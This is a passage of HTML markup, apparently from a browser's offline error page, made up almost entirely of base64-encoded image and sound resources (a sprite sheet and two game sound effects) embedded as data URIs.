xQxaSLSTg3WpBHYQ9IERdpqijQmLi09qkXaYY+eKqndeBLXAFU+RA6gTcKqd7yq40hzFlS3MRCX1uHoKdJqfG2c86AGb6Wbf1b7ejcAx4GINA68c8Jvhqd240lbw3p4hra66vSoLrZ+gAyDhqnLXZUzlB0gwXnAWWl2IH+KtPeOc/3vdCCoWxYDJEhfHVz4LTwzkJKSEmetDN1ygARvA47/7OfQud4OJKWkxFJxCQOh5pP3S0lJSUlJSYmq4sipVcdF/Y4pqcfbnwNHgXFRv2FKagWgOG74D97a+h1Tonw8ZgiLjxo6nxQteV1GzmzK8NlxYkyMz/lAydGmEEVJSe7Mc0dJrY8uPyaedO4PN5I96Zsr+yp9c6ppKwKjSIuurYAZk48wy4xJb7COO2jU3CIXKPsqcV8dMnXaEjuiO76DL9xLZV/Va9+T6oP/LSVN3yO3wMXzRLEnY9lXyUk8dOquw8R4vHNG1T3fmCa90LKv0vfV/+2dQW6jQBBFEascwyqpL9RSiZO0ejvL4QZDbmB8g/hy0zXwRUPZ0QiRDfwnJ5aesstTCdNNm7yAEEJaWXE7ztQQEnRFPM6Q04+orftuwLS64XaUacjpR5Q7KyQuRirMBt0QjzLNmSHyr7TNSVuFOJuPYRjGifsw/GFp+yCtqBHlnemH4XOcKdH9Ymm7IKIT8eYNShvB/X1p3cYY2RlNznSXKI20CgQmrk2PkWZ8U1remtrBqDddukJpRNxHvxDDaqj1w7hwn0pLKbl5lfOL0pIrzZkuX6A00sYqDwy5sBpq/edYMZWWsxWTC3VpaWsK6o12G5NgmhPD0uRlaQFmKu05Pp6FL5TW5ZxRydSMqbQ1BXXGulqbDNOcFtKqqMoM7q5FM6Eq7WGlGShNp5lmoBm0B4MQVwYzbW0STENOS1AJUTQKLsuso2ARiBRnprfKvsbCo7zdUVpeLrLiG5O6vDX22pguw5y0NIKurDIJqorSROyXvU+ljVaaUZeWXFfedMmX5kyXLlAaCXNkWpcWA0JAaV/PbWkp/09pzmjypek1SmNp0ZWmMEtpoytNfUU7zTVLY2nK0sjPlKa+NGFp5AdKc58INE4/LI0cWloUe6E0TDjxpT1YGtmLaEFEcD8NJkiA6S2xmRGlZYBmDjENOftWDtFCrEyU9WrUBFajsIqElaajTEOuVFpQZKDx3Qr7Mozwx4eYhpyXsJR2m4wsGbzeNcQ9t2QHLf7pKjD1SPM7IVka2UUruKshMMGEISyNHMe8mh6lMrhuc88RDCyN7Gba9xhvlYlaBJ/CI8fSBg0qt9pIEYvpkdrdRhpLI57dXw66Mh+/K3haAuEJMOQ88FQrsoO/etICpT2ul1QAAAAASUVORK5CYII=" jstcache="0">
    <img id="offline-resources-2x" src="data:image/png;base64,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" jstcache="0">
    <template id="audio-resources" jstcache="0">
      <audio id="offline-sound-press" src="data:audio/mpeg;base64,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"></audio>
      <audio id="offline-sound-hit" src="data:audio/mpeg;base64,T2dnUwACAAAAAAAAAABVDxppAAAAABYzHfUBHgF2b3JiaXMAAAAAAkSsAAD/////AHcBAP////+4AU9nZ1MAAAAAAAAAAAAAVQ8aaQEAAAC9PVXbEEf//////////////////+IDdm9yYmlzNwAAAEFPOyBhb1R1ViBiNSBbMjAwNjEwMjRdIChiYXNlZCBvbiBYaXBoLk9yZydzIGxpYlZvcmJpcykAAAAAAQV2b3JiaXMlQkNWAQBAAAAkcxgqRqVzFoQQGkJQGeMcQs5r7BlCTBGCHDJMW8slc5AhpKBCiFsogdCQVQAAQAAAh0F4FISKQQghhCU9WJKDJz0IIYSIOXgUhGlBCCGEEEIIIYQQQgghhEU5aJKDJ0EIHYTjMDgMg+U4+ByERTlYEIMnQegghA9CuJqDrDkIIYQkNUhQgwY56ByEwiwoioLEMLgWhAQ1KIyC5DDI1IMLQoiag0k1+BqEZ0F4FoRpQQghhCRBSJCDBkHIGIRGQViSgwY5uBSEy0GoGoQqOQgfhCA0ZBUAkAAAoKIoiqIoChAasgoAyAAAEEBRFMdxHMmRHMmxHAsIDVkFAAABAAgAAKBIiqRIjuRIkiRZkiVZkiVZkuaJqizLsizLsizLMhAasgoASAAAUFEMRXEUBwgNWQUAZAAACKA4iqVYiqVoiueIjgiEhqwCAIAAAAQAABA0Q1M8R5REz1RV17Zt27Zt27Zt27Zt27ZtW5ZlGQgNWQUAQAAAENJpZqkGiDADGQZCQ1YBAAgAAIARijDEgNCQVQAAQAAAgBhKDqIJrTnfnOOgWQ6aSrE5HZxItXmSm4q5Oeecc87J5pwxzjnnnKKcWQyaCa0555zEoFkKmgmtOeecJ7F50JoqrTnnnHHO6WCcEcY555wmrXmQmo21OeecBa1pjppLsTnnnEi5eVKbS7U555xzzjnnnHPOOeec6sXpHJwTzjnnnKi9uZab0MU555xPxunenBDOOeecc84555xzzjnnnCA0ZBUAAAQAQBCGjWHcKQjS52ggRhFiGjLpQffoMAkag5xC6tHoaKSUOggllXFSSicIDVkFAAACAEAIIYUUUkghhRRSSCGFFGKIIYYYcsopp6CCS